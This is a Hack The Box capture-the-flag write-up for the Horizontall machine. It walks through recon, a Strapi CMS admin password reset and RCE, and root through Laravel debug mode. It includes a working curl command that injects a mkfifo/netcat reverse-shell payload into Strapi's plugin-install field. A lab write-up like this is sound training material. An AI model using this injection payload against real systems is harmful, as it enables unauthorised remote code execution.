Hello everyone , I will be sharing my writeup for HTB-Horizontall machine which was rated as a easy linux box , starting off with the nmap we can only see two ports ssh and http on which web server was running , the webserver had a template and looking into the JavaScript files it revealed a subdomain on which strapi cms was running (which we can identify it through wappalyzer or looking into source files) , after looking for exploits it had two vulnerabilities one being a password reset for admin user and the other for remote code execution , after getting a foothold on the machine we can see a local port on which laravel framework was running with debug mode enabled which also had a remote code execution exploit and laravel being ran as a root user gave us the root shell.
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP
2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy
4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmI
NBJNsYC8F7jN0=
| 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
When visit the web server it’s going to redirect us to horizontall.htb so let's add this in /etc/hots file
We can see from the icon on title bar it’s from Vue.js which is a javascript framework. At the bottom of the web page we can see a contact form
But on clicking the send button it doesn’t do anything
I tried to poke around the website manually but didn’t find anything so ran nikto scan but it didn't showed anything interesting other than nginx version which we already saw from nmap scan
Tried fuzzing for files using gobuster and ffuf but they failed as the connection was timing out whenever I ran the tool again to look for any subdomains but it failed so I tired to look around in JavaScript files
This JavaScript file gave us a subdomain so let’s add and see where it takes
From wappalyzer results it seems this is scrapi cms so search for any vulnerabilities I saw snyk listed some we can also verify the version for strapi
Version is 3.0.0-beta.17.4 so we are on the right track
Let’s try visiting the link
Here it asks us for the admin credentials so let’s try admin:admin but this failed , going back to vulnerabilities page we can see Improper Access Control , there's a flaw in JavaScript files which doesn't properly handle password resets so we can reset the password of any user in this case "admin".
So I found a python script after googling for password reset which can reset a user’s password by supplying a valid username , the IP address and the new password which we want to set
Foothold
And we are in the admin panel
Now focusing on getting a rce I found another article related to it
curl -i -s -k -X $'POST' -H $'Host: localhost:1337' -H $'Authorization: Bearer [jwt]' -H $'Content-Type: application/json' -H $'Origin: http://localhost:1337' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f)\",\"port\":\"1337\"}' $'http://localhost:1337/admin/plugins/install'Here we need to use the jwt token which got after password reset so we need to use it there
I used --proxy as I was getting bad request error because at then end of json } was missing so I added that in burp suite and got a shell
Stabilize the shell with python3
If we take a look at local ports with ss -tulpn (socket status) , we'll see two local ports on which a web page is running
Privilege Escalation
The web page on port 1337 is the one we saw api-prod subdomain so , we'll need to port forward8000 , we can do this through ssh local port forwarding by including our public key in authroized_keys file so we can login with our private key
Let’s try to do port forwarding through ssh
This shows us the laravel version so there must be a CVE for this as well, we can check if the laravel applicaiton is running in debugging mode by visiting /profiles
Perfect now by following the way to exploit deubg mode to get remote code execution
Clone these two repositories
First we’ll going to make a file with ls command being executed than run that PHAR file against the python script
And the rce works so now we can get a reverse shell by including the netcat payload
